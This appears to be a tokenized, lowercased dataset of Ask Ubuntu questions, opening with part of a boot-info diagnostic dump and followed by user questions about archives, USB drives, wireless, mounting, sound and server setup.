_________________________________________________________________________ file system : ntfs boot sector type : windows xp boot sector info : no errors found in the boot parameter block . operating system : windows xp boot files/dirs : =========================== drive/partition info : ============================= drive : sda ___________________ _____________________________________________________ disk /dev/sda : 80.1 gb , 80060424192 bytes 255 heads , 63 sectors/track , 9733 cylinders , total 156368016 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/sda1 * 2,048 150,226,943 150,224,896 83 linux /dev/sda2 150,228,990 156,366,847 6,137,858 5 extended /dev/sda5 150,228,992 156,366,847 6,137,856 82 linux swap / solaris drive : sdb ___________________ _____________________________________________________ disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/sdb1 * 63 976,751,999 976,751,937 7 hpfs/ntfs blkid -c /dev/null : ____________________________________________________________ device uuid type label /dev/sda1 d682c9bd-dd89-4827-9802-a1f921ebe21c ext4 /dev/sda2 : pttype= '' dos '' /dev/sda5 09e9c2cb-d903-4f0b-a181-536951845231 swap /dev/sda : pttype= '' dos '' /dev/sdb1 b21844eb1844afe1 ntfs /dev/sdb : pttype= '' dos '' ============================ `` mount | grep ^/dev output : =========================== device mount_point type options /dev/sda1 / ext4 ( rw , errors=remount-ro , commit=0 ) =========================== sda1/boot/grub/grub.cfg : =========================== # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.35-28-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux /boot/vmlinuz-2.6.35-28-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro quiet splash initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.35-28-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c echo 'loading linux 2.6.35-28-generic ... ' linux /boot/vmlinuz-2.6.35-28-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux /boot/vmlinuz-2.6.35-22-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro quiet splash initrd /boot/initrd.img-2.6.35-22-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c echo 'loading linux 2.6.35-22-generic ... ' linux /boot/vmlinuz-2.6.35-22-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-22-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . menuentry `` windows xp '' { set root= ( hd1,1 ) chainloader ( hd1,1 ) +1 } # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # =============================== sda1/etc/fstab : =============================== # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=09e9c2cb-d903-4f0b-a181-536951845231 none swap sw 0 0 =================== sda1 : location of files loaded by grub : =================== 51.7gb : boot/grub/core.img 58.5gb : boot/grub/grub.cfg 1.2gb : boot/initrd.img-2.6.35-22-generic 1.3gb : boot/initrd.img-2.6.35-28-generic 58.2gb : boot/vmlinuz-2.6.35-22-generic 51.7gb : boot/vmlinuz-2.6.35-28-generic 1.3gb : initrd.img 1.2gb : initrd.img.old 51.7gb : vmlinuz 58.2gb : vmlinuz.old =========================== unknown mbrs/boot sectors/etc ======================= unknown bootloader on sda2 00000000 d9 ed 13 ab ff a8 33 8c 01 b2 47 99 e1 4a b1 f1 | ... ... 3 ... g..j..| 00000010 69 5f a7 29 a4 1a 03 9e 31 b9 45 02 71 e6 58 78 |i_ . ) ... .1.e.q.xx| 00000020 3d f6 ee 7b 3e 33 1b 82 c6 7d cf 1a c8 e7 bc 2f |=.. { > 3 ... } ... ../| 00000030 b9 e1 70 75 cf 18 aa e7 d5 7e 3c f1 b4 e7 9e 3a |..pu ... ..~ < ... . : | 00000040 55 38 f1 b4 ee 78 59 0b 5e f7 3c 4c 57 73 9c 2a |u8 ... xy.^. < lws . *| 00000050 28 f1 19 ed 11 9c b2 19 e2 80 92 1c 7b 84 ee 0b | ( ... ... ... .. { ... | 00000060 e2 c0 ac af 0a 50 42 b9 cf 0c dc 2c 20 77 85 dc | ... ..pb ... . , w..| 00000070 8f 70 5f 7b 84 9b a1 f7 8c 2d ee 70 5c ae f7 39 |.p_ { ... ..-.p\..9| 00000080 63 f7 09 8a ec 79 4c ed 9f cc ad 3c f8 1b 47 7d |c ... .yl ... . < ..g } | 00000090 3f 97 d5 16 cb 29 45 38 25 61 36 08 de 10 93 0f | ? ... . ) e8 % a6 ... ..| 000000a0 95 4f ea 54 f9 89 ff f1 bf 9a cc bb fd b6 22 b1 |.o.t ... ... ... . '' .| 000000b0 65 08 05 21 78 19 46 b0 24 7e fb de d4 b3 ba d6 |e.. ! x.f. $ ~ ... ... | 000000c0 ec 11 65 82 ee 10 1d 12 04 91 da 6d 67 47 ea 9b |..e ... ... ..mgg..| 000000d0 6f b0 aa fb cb 67 10 64 86 e8 26 85 fb f9 50 77 |o ... .g.d.. & ... pw| 000000e0 9d 13 9b 9e d9 11 f3 a1 50 1b 11 b7 93 79 9f ab | ... ... ..p ... .y..| 000000f0 c1 b6 86 0f 35 ed d4 9f dc f8 db bd ed 45 3a 68 | ... .5 ... ... ..e : h| 00000100 54 68 4a 1d d1 fc b8 c9 72 b4 d7 7b 60 e7 39 2f |thj ... ..r.. { `.9/| 00000110 2a 0a 4e 52 72 52 c6 e2 2a 55 6a 2a e1 82 40 71 |*.nrrr..*uj*.. @ q| 00000120 11 11 e0 53 d6 ff 1b a9 c6 65 df 1e b7 15 6f a2 | ... s ... ..e ... .o.| 00000130 15 02 a4 6d 19 b7 78 57 a6 ee 9e 36 08 7d 6f 7c | ... m..xw ... 6 . } o|| 00000140 fd f7 7c d5 40 ff 0f c7 97 dc aa 00 ce 8b bb dc |..| . @ ... ... ... ..| 00000150 e2 eb 1c 50 74 d8 14 cc 9a d6 5c a2 ab f2 67 f9 | ... pt ... ..\ ... g.| 00000160 58 ed 43 79 0e 78 7a 5c a6 f8 7b e8 05 4e 62 8a |x.cy.xz\.. { ..nb.| 00000170 0a 5f 22 ee a6 38 b9 e1 32 45 97 08 cc 75 66 c6 |._ '' ..8..2e ... uf.| 00000180 b3 a2 2d 89 a1 e9 95 21 28 53 fd dd be b1 b2 a2 |..- ... . ! ( s ... ... | 00000190 78 3f a3 c9 3d e3 31 54 88 cf 78 0d e1 21 a8 74 |x ? ..=.1t..x.. ! .t| 000001a0 06 60 9d 21 c6 7a 24 e1 cc 28 f8 98 e0 99 e3 fc |.`. ! .z $ .. ( ... ... | 000001b0 fa 8b eb d5 56 03 20 b8 54 ba c6 ee 9f 57 00 fe | ... .v. .t ... .w..| 000001c0 ff ff 82 fe ff ff 02 00 00 00 00 a8 5d 00 00 00 | ... ... ... ... ] ... | 000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200
31292	ubuntu one stuck in rescan	trying to sync about 80 gigs of data . it has been several days . this is my syncd log log exceptions log ex log
31298	how to extract and join files xxx.zip , xxx.z01 and xxx.z02	i have three files 1.zip , 1.z01 1.z02 . i would like to extract and join them into a file , by right clicking 1.zip and selecting `` extract here '' . but then there comes an error : 7-zip 9.04 beta copyright ( c ) 1999-2009 igor pavlov 2009-05-30 p7zip version 9.04 ( locale=en_us.utf8 , utf16=on , hugefiles=on,2 cpus ) error : /home/tim/desktop/1.zip : can not open file as archive errors : 1 i was wondering what the problem it is and how i can solve it ? thanks and regards ! added : is my usage of `` unzip -ff '' wrong ? it seems not work : $ unzip -ff 1.zip archive : 1.zip warning [ 1.zip ] : zipfile claims to be last disk of a multi-part archive ; attempting to process anyway , assuming all parts have been concatenated together in order . expect `` errors '' and warnings ... true multi-part support does n't exist yet ( coming soon ) . file # 1 : bad zipfile offset ( local header sig ) : 0 thanks again ! 2nd added : still ai n't right . $ cat 1.z01 1.z02 1.zip > combined.zip & & unzip -ff combined.zip archive : combined.zip warning [ combined.zip ] : zipfile claims to be last disk of a multi-part archive ; attempting to process anyway , assuming all parts have been concatenated together in order . expect `` errors '' and warnings ... true multi-part support does n't exist yet ( coming soon ) . warning [ combined.zip ] : 209829313 extra bytes at beginning or within zipfile ( attempting to process anyway ) file # 1 : bad zipfile offset ( local header sig ) : 209829313 ( attempting to re-compensate ) extracting : 1.wmv bad crc ee181eef ( should be f3c61875 ) it generated 1.wmv , which can play well only until midway in gnome mplayer . 3rd added : am i using 7z wrongly : $ 7z e 1.z01 7-zip 9.04 beta copyright ( c ) 1999-2009 igor pavlov 2009-05-30 p7zip version 9.04 ( locale=en_us.utf8 , utf16=on , hugefiles=on,2 cpus ) processing archive : 1.z01 error : can not open file as archive $ 7z e 1.zip 7-zip 9.04 beta copyright ( c ) 1999-2009 igor pavlov 2009-05-30 p7zip version 9.04 ( locale=en_us.utf8 , utf16=on , hugefiles=on,2 cpus ) processing archive : 1.zip error : can not open file as archive
31303	how do you refresh formulas in openoffice/libreoffice calc ?	i started using libreoffice and when i had laid out the formulas i pressed f9 like i normally did in excel and nothing happened . i could n't figure out what was the keyboard shortcut to refresh and neither i could find it on the application menu . how do i do it ? thanks
31307	why ca n't i copy a large number of files to my usb flash drive ?	final update : so it turns out that the drive was indeed defective and i was able to get it replaced - the replacement works great ! what happens : i insert the flash drive . i try to copy 2gb of files . about 600mb ( but not always the same amount ) in to the transfer , it aborts and forcefully dismounts the drive . plugging it in again mounts it as read only due to filesystem errors . information in /var/log/syslog : apr 4 20:19:09 my-laptop kernel : [ 10720.130076 ] usb 1-4 : new high speed usb device using ehci_hcd and address 2 apr 4 20:19:09 my-laptop kernel : [ 10720.284655 ] scsi6 : usb-storage 1-4:1.0 apr 4 20:19:10 my-laptop kernel : [ 10721.280796 ] scsi 6:0:0:0 : direct-access corsair survivor gtr 0.00 pq : 0 ansi : 2 apr 4 20:19:10 my-laptop kernel : [ 10721.281920 ] sd 6:0:0:0 : attached scsi generic sg3 type 0 apr 4 20:19:10 my-laptop kernel : [ 10721.284361 ] sd 6:0:0:0 : [ sdc ] 63438848 512-byte logical blocks : ( 32.4 gb/30.2 gib ) apr 4 20:19:10 my-laptop kernel : [ 10721.284863 ] sd 6:0:0:0 : [ sdc ] write protect is off apr 4 20:19:10 my-laptop kernel : [ 10721.284870 ] sd 6:0:0:0 : [ sdc ] mode sense : 00 00 00 00 apr 4 20:19:10 my-laptop kernel : [ 10721.284876 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through apr 4 20:19:10 my-laptop kernel : [ 10721.287862 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through apr 4 20:19:10 my-laptop kernel : [ 10721.287873 ] sdc : sdc1 apr 4 20:19:10 my-laptop kernel : [ 10721.301238 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through apr 4 20:19:10 my-laptop kernel : [ 10721.301243 ] sd 6:0:0:0 : [ sdc ] attached scsi removable disk apr 4 20:20:03 my-laptop kernel : [ 10774.494709 ] fat : filesystem error ( dev sdc1 ) apr 4 20:20:03 my-laptop kernel : [ 10774.494714 ] fat_free_clusters : deleting fat entry beyond eof apr 4 20:20:03 my-laptop kernel : [ 10774.494718 ] fat : filesystem has been set read-only apr 4 20:22:04 my-laptop kernel : [ 10895.160070 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 apr 4 20:22:04 my-laptop kernel : [ 10895.700029 ] usb 1-4 : device not accepting address 2 , error -71 apr 4 20:22:04 my-laptop kernel : [ 10895.820047 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 apr 4 20:22:04 my-laptop kernel : [ 10895.950038 ] usb 1-4 : device descriptor read/64 , error -71 apr 4 20:22:05 my-laptop kernel : [ 10896.191050 ] usb 1-4 : device descriptor read/64 , error -71 apr 4 20:22:05 my-laptop kernel : [ 10896.420054 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 apr 4 20:22:05 my-laptop kernel : [ 10896.840042 ] usb 1-4 : device not accepting address 2 , error -71 apr 4 20:22:05 my-laptop kernel : [ 10896.962678 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 apr 4 20:22:06 my-laptop kernel : [ 10897.380047 ] usb 1-4 : device not accepting address 2 , error -71 apr 4 20:22:06 my-laptop kernel : [ 10897.380095 ] usb 1-4 : usb disconnect , address 2 apr 4 20:22:06 my-laptop kernel : [ 10897.380122 ] sd 6:0:0:0 : [ sdc ] unhandled error code apr 4 20:22:06 my-laptop kernel : [ 10897.380125 ] sd 6:0:0:0 : [ sdc ] result : hostbyte=did_error driverbyte=driver_ok apr 4 20:22:06 my-laptop kernel : [ 10897.380130 ] sd 6:0:0:0 : [ sdc ] cdb : write ( 10 ) : 2a 00 00 12 9e 00 00 00 f0 00 apr 4 20:22:06 my-laptop kernel : [ 10897.380141 ] end_request : i/o error , dev sdc , sector 1220096 apr 4 20:22:06 my-laptop kernel : [ 10897.382530 ] sd 6:0:0:0 : [ sdc ] unhandled error code apr 4 20:22:06 my-laptop kernel : [ 10897.382534 ] sd 6:0:0:0 : [ sdc ] result : hostbyte=did_no_connect driverbyte=driver_ok apr 4 20:22:06 my-laptop kernel : [ 10897.382539 ] sd 6:0:0:0 : [ sdc ] cdb : write ( 10 ) : 2a 00 00 12 9e f0 00 00 f0 00 apr 4 20:22:06 my-laptop kernel : [ 10897.382549 ] end_request : i/o error , dev sdc , sector 1220336 apr 4 20:22:06 my-laptop kernel : [ 10897.385121 ] fat : fat read failed ( blocknr 329 ) apr 4 20:22:06 my-laptop kernel : [ 10897.385150 ] fat : fat read failed ( blocknr 322 ) apr 4 20:22:06 my-laptop kernel : [ 10897.385173 ] fat : fat read failed ( blocknr 329 ) apr 4 20:22:06 my-laptop kernel : [ 10897.385188 ] fat : fat read failed ( blocknr 322 ) apr 4 20:22:06 my-laptop kernel : [ 10897.390581 ] fat : unable to read inode block for updating ( i_pos 496133 ) apr 4 20:22:06 my-laptop kernel : [ 10897.830055 ] usb 1-4 : new high speed usb device using ehci_hcd and address 3 apr 4 20:22:06 my-laptop kernel : [ 10897.962671 ] usb 1-4 : device descriptor read/64 , error -71 apr 4 20:22:07 my-laptop kernel : [ 10898.200060 ] usb 1-4 : device descriptor read/64 , error -71 apr 4 20:22:07 my-laptop kernel : [ 10898.432548 ] usb 1-4 : new high speed usb device using ehci_hcd and address 4 apr 4 20:22:07 my-laptop kernel : [ 10898.560068 ] usb 1-4 : device descriptor read/64 , error -71 apr 4 20:22:07 my-laptop kernel : [ 10898.802603 ] usb 1-4 : device descriptor read/64 , error -71 apr 4 20:22:07 my-laptop kernel : [ 10899.030075 ] usb 1-4 : new high speed usb device using ehci_hcd and address 5 apr 4 20:22:08 my-laptop kernel : [ 10899.460032 ] usb 1-4 : device not accepting address 5 , error -71 apr 4 20:22:08 my-laptop kernel : [ 10899.580064 ] usb 1-4 : new high speed usb device using ehci_hcd and address 6 apr 4 20:22:08 my-laptop kernel : [ 10900.000071 ] usb 1-4 : device not accepting address 6 , error -71 apr 4 20:22:08 my-laptop kernel : [ 10900.000101 ] hub 1-0:1.0 : unable to enumerate usb device on port 4 apr 4 20:22:09 my-laptop kernel : [ 10900.322588 ] usb 4-2 : new full speed usb device using uhci_hcd and address 2 apr 4 20:22:09 my-laptop kernel : [ 10900.466510 ] usb 4-2 : not running at top speed ; connect to a high speed hub apr 4 20:22:19 my-laptop kernel : [ 10910.471597 ] usb 4-2 : string descriptor 0 read error : -110 apr 4 20:22:24 my-laptop kernel : [ 10915.471643 ] usb 4-2 : ca n't set config # 1 , error -110 other steps taken : i tried plugging it into different usb ports . i tried plugging it into one of the root ports on the pc . i ran badblocks on the device and it came up clean . i tried wiping the partition table before formatting - no difference . i have an external usb 2.0 1tb hard drive that runs fine and can perform large transfers without incident . smartctl -t normal /dev/sdx fails , saying `` terminate command early due to bad response to iec mode page . a mandatory smart command failed : exiting . '' note : thanks to djeikyb for helping me with some of the steps .
31309	how to customise one session for dual monitors , and another for single monitors ?	i run ubuntu on my laptop . roughly 75 % of the time , i 'm at work with a second monitor attached . the rest of the time i 'm running with just the laptop screen . i can configure my panels ( and a few misc things like conky ) fine with dual monitors , but then when i run with my laptop only things look messed up ( multiple top and bottom panels , etc ) . if i set things up for a single monitor , then things are n't set up when i 'm using dual monitors . what i want to do is be able to define things like my gnome panels in a user choosable ( or automatically selected ) to get around this . is this possible , and if so , where do i start ?
31314	problem after auto-mount using pysdm	i wanted to auto-mount my ntfs drives on boot time , so i went through this article to do so using pysdm . i followed this article auto-mount-your-ntfs-partition-in-ubuntu . but when i tried to uncheck the box mount file system in read only mode , it did n't work . it was checked again , on its own . the drives were also mounted not by the user names , but by the names sda3 , sda5 etc . in the option for the specifying the name for the ntfs drives , i specified my own names , the names by which the drives were usually mounted . i did n't try to uninstall the package , as i thought that might be harmful and could be fatal . now , when i restarted my ubuntu , it just does n't restart . it stays in an infinite loop , i guess and even the login screen does n't showup . please help me , and if something is not clear in the question , let me know . suggest any possible way , i can get my ubuntu ( 10.04 ) back and running , with my packages as they were configured . edited : i ran ubuntu in the recovery mode , and it showed the following output on the console twice and then went off to the same ubuntu logo as earlier on . fcsk from util-linux-ng 2.17.2 /dev/sda8 : clean , 635759/1152816 files , 2954346/4605952 blocks mount : unknown filesystem type 'spoon' mountall : mount /media/silver [ 782 ] terminated with status 32 mountall : filesystem could not be mounted : /media/silver init : ureadahead-other main process ( 893 ) terminated with status 4 init : ureadahead-other main process ( 906 ) terminated with status 4 init : ureadahead-other main process ( 917 ) terminated with status 4 the error that i can see is that i incidently typed the mount location of a drive to /sda/silver spoon and that is causing trouble .
31316	can shell ( command line ) display gui generated commands ?	can the shell ( command line ) display gui generated commands ? example : go to : applications = > programming = > netbeans when netbeans starts i want to see in shell $ netbeans / gksu netbeans ( edit ) when i doing with netbeans svn update i want to see this in shell edit : netbeans only example thanks
31317	why are my speakers working but not my headphones ?	i have ubuntu 10.10 installed on my asus g50vtx5 . sound works for the speakers but there 's no sound from the headphones . headphones are working fine in other devices .
31325	i want 'none ' for visual effects but they keep reverting back	ubuntu 10.04 64bit on a dell latitude e6400 laptop . i want `` none '' under visual effects ( on the appearance preferences ) , but when i reboot it reverts to normal . i 've tried uninstalling compiz but that clearly upsets the gods because then i lose my title bars . googling for help on this produces answers involving the visual effects option , which is all ghosted out once i 've uninstall compiz . not only that , but the keyboard is ignored in all windows unless only one window is open ( actually , it might be just the window the mouse is currently over ) . so if i google for help and the answer it is to type something into terminal , i can not do this until i quit the browser . i installed another instance of ubuntu from the same cd , which is working fine . it seems to me that something else is perhaps trying to load/use compiz it when i reboot , and if it 's not there it has this title bar problem . there 's nothing obvious in my `` startup applications '' list . edit : i just created another user , and for this user the desired setting sticks , suggesting it 's a per-user setting/problem , not a system wide one .
31327	how can i connect to the internet using an adsl modem ?	i have a dualboot ubuntu and windows xp on my pc . does ubuntu require drivers for the onboard ethernet card ? if not , how can i make an internet conection using an adsl modem ?
31330	does mysqldump return a status ?	i am creating a script that backups a mysql db using the mysqldump utility . i am writing this script in the shell `` sh '' . i would like to capture the output status of mysqldump in the script ( i.e . if the mysqldump command failed or succeeded ) so i can report if the script was successful or not . does mysqldump return an output status ? can someone please give me instructions on how to do this ?
31338	what is an kernel update with `` bump abi '' ?	as you can see in the changelog for the linux kernel , there are update messages like `` bump abi - maverick abi 28 '' . according to the ubuntu wiki , abi is something like a bridge between the kernel space and the other modules ( my interpretation ) . does such an update adds extra features and / or bugfixes ? should i upgrade my kernel to the next version ?
31343	one year of ubuntu experience , still not an expert ?	google always helps to find solution , but most of the time i just copy paste all the codes that are suggested . sometimes it works like charm , sometimes i screw up my ubuntu . not anymore . i really want to know whats under the hood and how these things work . so , please suggest me how to get started from the very basic of ubuntu , perhaps more generally linux .
31347	audio is not working on macbook air 3,2	what info should i provide in order to answer this question ? thanks .
31350	how do i use simpleproxy ?	can some one give me an example scenario where this package can be used ? http : //packages.ubuntu.com/dapper/simpleproxy
31353	firefox 4.0 theming	i am dual booting ubuntu 10.10 maverick meerkat and windows 7 on my dell inspiron 1525 laptop . and i have installed the latest firefox 4.0 on both the operating system . however when i click the organize tab button on windows , i can see the firefox personna theme applied in the background as shown in the screenshot below . and here is it installed in ubuntu 10.10 as you can see from both the screenshots , the firefox 4.0 theme in ubuntu can not be seen under the organize tabs page . also the firefox button is missing in the ubuntu 10.10 system . although the theme can be seen in ubuntu when browsing the web . it is only in the tab organization page that i dont see the firefox personna theme applied but just a dull grey background . update : i am running firefox 4.0 final version in windows 7 and firefox 4.0 rc in ubuntu 10.10 installed using the firefox-next ppa . update : i have submitted a feedback as suggested by ăśndrăźk . : ) update : i tried it on the latest stable release of firefox 4.0 ( downloaded from their website ) and still have this problem . why is this so ?
31355	on 10.04 , should i upgrade from python 2.6.5 to 2.6.6 ?	the default python version on ubuntu 10.04 server edition is 2.6.5 . the latest version of the python 2.6 series is 2.6.6 . does ubuntu support 2.6.6 or should i leave it at the default version . if i can upgrade the version , what 's the corresponding apt-get command to upgrade the python ?
31360	installed google earth now ca n't open skype	i installed google earth as per this walkthrough and now i ca n't open or use skype . i had to use a sudo prefix on some of the steps to edit files and do things without `` permission denied '' errors . i desperately need skype back . any thoughts on what went wrong or how to uninstall google earth and fix my problem ? thanks in advance .
31362	random 10.10 freeze diagnosis	i am running 10.10 desktop version and it has been working for a month or so . all of a sudden , i am getting `` random '' freezes from 5-15 minutes after startup . the system never comes back and i have to reboot . i am an ubuntu/linux newbie , so i do n't know how to begin to diagnose the problem . another thing to mention is that i am running linux inside of virtualbox 4.0.4 . are there logs i can checkout ? anything else i can consider ? i can provide more level of detail if needed - i just do n't know what else is relevant . thanks !
31368	extra effects does not appear on dell inspiron 5010	i 'm using dell inspiron 5010 . recently , i installed 10.10 ubuntu netbook edition within windows 7 , but there 's no extra graphical effects . once i try to activate them , why does it say graphic effects could not be changed ? my laptop has laptop uses 1 gb vga as well .
31369	vim keybindings for nautilus	is there a way to configure nautilus to use vim keybdings . by vim keybindings i am not saying just h j k l but other things like regex search on filenames too . i know i can simply use a command line , but sometimes i have to use this crap file browser for browsing the directories . or is there any other gui file browser which has customizability ?
31374	intel 3945abg wireless not working at all	link to original launchpad discussion basically for a few weeks my wireless has n't been working properly . i could see wireless networks , but not connect to them . asked launchpad on how to help , and when i did what they said to do , it only made my problem worse , now i cant see any wireless networks . link to re-opened question . same thing as original i just created a new question with the same stuff so new people could see it . *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 02 serial : 00:1c : bf : a4 : ae:11 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=2.6.35-28-generic firmware=15.32.2.9 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:45 memory : f8100000-f8100fff 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no
31377	how can i distribute a file across multiple systems in a network ?	i have more than 60 ubuntu systems in my network . i want to copy files from one system to other ubuntu systems . all ip addresses are listed in a text file . so what command can i use to complete the task ? any bash programs ?
31378	how to reset kubuntu to initial state ?	is there a way to reset kubuntu to the initial state ? under initial state , i mean the system and all settings are as kubuntu was installed on a clean disk , but to preserve installed packages . if possible i would like to avoid making data backup and reinstalling kubuntu .
31379	docky `` enable compositing '' error and black bar visualized instead of it	i get this black bar across the bottom of my screen when ever i boot up , tried reboot and no joy , keep getting messages from docky telling me to `` enable composting '' . was using dual monitors before this happened , take the monitor out and i 'm stuck with this
31381	ca n't get `` gem '' command to work - why ?	ubuntu 10.10 here . on the command line , i 'm trying to do : gem install railsless-deploy i get this message : the program 'gem ' can be found in the following packages : * rubygems1.8 * rubygems1.9.1 try : sudo apt-get install so i did : sudo apt-get install rubygems1.9.1 i then try the command again : gem install railsless-deploy but the same quoted message appears again . why ? any help to figure this out ? thanks a lot .
31382	drawing tool for evacuation plan ?	i 've tried to draw the plan with dia , gimp and inkscape , but that was too dificult for me . is there better drawing tool for that ?
31386	how i debug an application that loads at startup / on login ?	i am having with the networkmanger applet 0.8.1 on ubuntu 10.10 amd64 . it ( or networkmanager or my wireless driver ) seem to crash occasionally , which means i lose all network connectivity . how can i debug networkmanager and the applet on startup and login ? i want to know what is causing the problem so that i can fix it or file a bug report . edit : this page provides some good details about debugging the networkmanager daemon , but i 'm still having trouble with the applet ( e.g . the applet crashes , i lose my connection , i restart networkmanager and use commandline utilities , regain my connection , but no applet comes back ) .
31387	why does n't ubuntu one save purchased music in the designated music folder ?	i like all of my music to be in one place - my music partition . however , when i purchase music from ubuntu one i have to physically move my music from the ~/.ubuntuone folder and into my music partition . is it because of the feature of syncing purchased music to all devices that there is a separate folder ? it 's a great feature , no doubt , but i still find myself navigating to that folder to move things myself .
31393	php server web user setup	i 'm needing to setup a basic web user account on my ubuntu 10.10 server to host web pages . this account should be limited to access only the necessary directories on the machine . i setup the following account but nothing happens when i try to log into it : : ~ $ groupadd -g 1005 webgroup //i then changed the group and permissions of a current user i had already created : ~ $ sudo usermod -g 1005 -s /bin/false -d /home/webuser/ webuser when trying to login using this account i enter the username [ webuser ] and the password but it just redirects me back to the login : prompt . i tried resetting the password but still have the same problem . can someone either tell me what i 'm doing wrong , or suggest another method that would achieve the same result ( if not a better one ) . it sounds like i do not want the user to be able to login at all . however , ( my grasp on this concept is apparently very small so bear with me ) does n't the user have to be logged in for web requests to be received by that user ? in other words , web requests are received and interpreted by the user who is logged in at that time 